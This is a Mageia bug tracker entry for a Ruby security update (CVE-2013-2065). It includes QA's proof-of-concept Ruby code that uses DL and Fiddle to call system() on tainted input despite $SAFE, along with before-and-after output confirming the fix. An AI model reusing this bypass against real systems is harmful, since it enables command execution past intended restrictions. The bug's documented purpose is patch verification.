| Summary: | ruby new security issue CVE-2013-2065 | ||
|---|---|---|---|
| Product: | Mageia | Reporter: | David Walser <luigiwalser> |
| Component: | Security | Assignee: | QA Team <qa-bugs> |
| Status: | RESOLVED FIXED | QA Contact: | Sec team <security> |
| Severity: | normal | ||
| Priority: | Normal | CC: | fundawang, sysadmin-bugs, tmb |
| Version: | 3 | Keywords: | validated_update |
| Target Milestone: | --- | ||
| Hardware: | i586 | ||
| OS: | Linux | ||
| URL: | http://lwn.net/Vulnerabilities/551067/ | ||
| Whiteboard: | has_procedure mga3-64-OK mga3-32-ok | ||
| Source RPM: | ruby-1.9.3.p429-1.mga3 | CVE: | |
| Status comment: | |||
|
Description
David Walser
2013-05-17 20:01:06 CEST
David Walser
2013-05-17 20:01:14 CEST
Whiteboard:
(none) =>
MGA3TOO Wait until mga3 released. I'll likely propose ruby 2.0 for mga4. Status:
NEW =>
ASSIGNED
Funda Wang
2013-05-21 08:37:01 CEST
Whiteboard:
MGA3TOO =>
MGA2TOO
Funda Wang
2013-05-21 08:37:29 CEST
Whiteboard:
MGA2TOO =>
(none) Please test ruby-1.9.3.p429-1.mga3 Assignee:
fundawang =>
qa-bugs Funda could you remember to add info for QA please. SRPM: ruby-1.9.3.p429-1.mga3.src.rpm ------------------------------------ lib(64)ruby1.9 ruby-doc ruby-irb ruby ruby-tk ruby-devel Testing complete mga3 64 PoC for CVE-2013-2065: http://www.ruby-lang.org/en/news/2013/05/14/taint-bypass-dl-fiddle-cve-2013-2065 Before ------ Needs requires adding to the scripts, so.. require 'dl' require 'dl/import' def my_function(user_input) handle = DL.dlopen(nil) sys_cfunc = DL::CFunc.new(handle['system'], DL::TYPE_INT, 'system') sys = DL::Function.new(sys_cfunc, [DL::TYPE_VOIDP]) sys.call user_input end $SAFE = 1 my_function "uname -rs".taint When run in irb it outputs.. irb(main):011:0> my_function "uname -rs".taint Linux 3.8.13-desktop-1.mga3 => 0 Also, for fiddle, adding require 'fiddle'.. require 'fiddle' def my_function(user_input) handle = DL.dlopen(nil) sys = Fiddle::Function.new(handle['system'], [Fiddle::TYPE_VOIDP], Fiddle::TYPE_INT) sys.call user_input end $SAFE = 1 my_function "uname -rs".taint Outputs.. irb(main):010:0> my_function "uname -rs".taint Linux 3.8.13-desktop-1.mga3 => 0 After ----- Using the same scripts in irb irb(main):011:0> my_function "uname -rs".taint SecurityError: tainted parameter not allowed from /usr/share/ruby/dl/func.rb:92:in `call' from /usr/share/ruby/dl/func.rb:92:in `call' from (irb):7:in `my_function' from (irb):11 from /usr/bin/irb:12:in `<main>' And.. irb(main):010:0> my_function "uname -rs".taint SecurityError: tainted parameter not allowed from (irb):6:in `call' from (irb):6:in `my_function' from (irb):10 from /usr/bin/irb:12:in `<main>' So CVE is confirmed and is now closed.
claire robinson
2013-05-24 15:44:44 CEST
Whiteboard:
(none) =>
has_procedure mga3-64-OK Testing complete mga3 32 Validating SRPM: ruby-1.9.3.p429-1.mga3.src.rpm Advisory TBC Could sysadmin please push from 3 core/updates_testing to core/updates when the advisory has been added. Thanks! Keywords:
(none) =>
validated_update Advisory: ======================== Updated ruby packages fix security vulnerability: Vulnerability in DL and Fiddle in Ruby before 1.9.3p429 where tainted strings can be used by system calls regardless of the $SAFE level set in Ruby. Native functions exposed to Ruby with DL or Fiddle do not check the taint values set on the objects passed in. This can result in tainted objects being accepted as input when a SecurityError exception should be raised (CVE-2013-2065). References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2065 http://www.ruby-lang.org/en/news/2013/05/14/taint-bypass-dl-fiddle-cve-2013-2065/ Update pushed: https://wiki.mageia.org/en/Support/Advisories/MGASA-2013-0155 Status:
ASSIGNED =>
RESOLVED |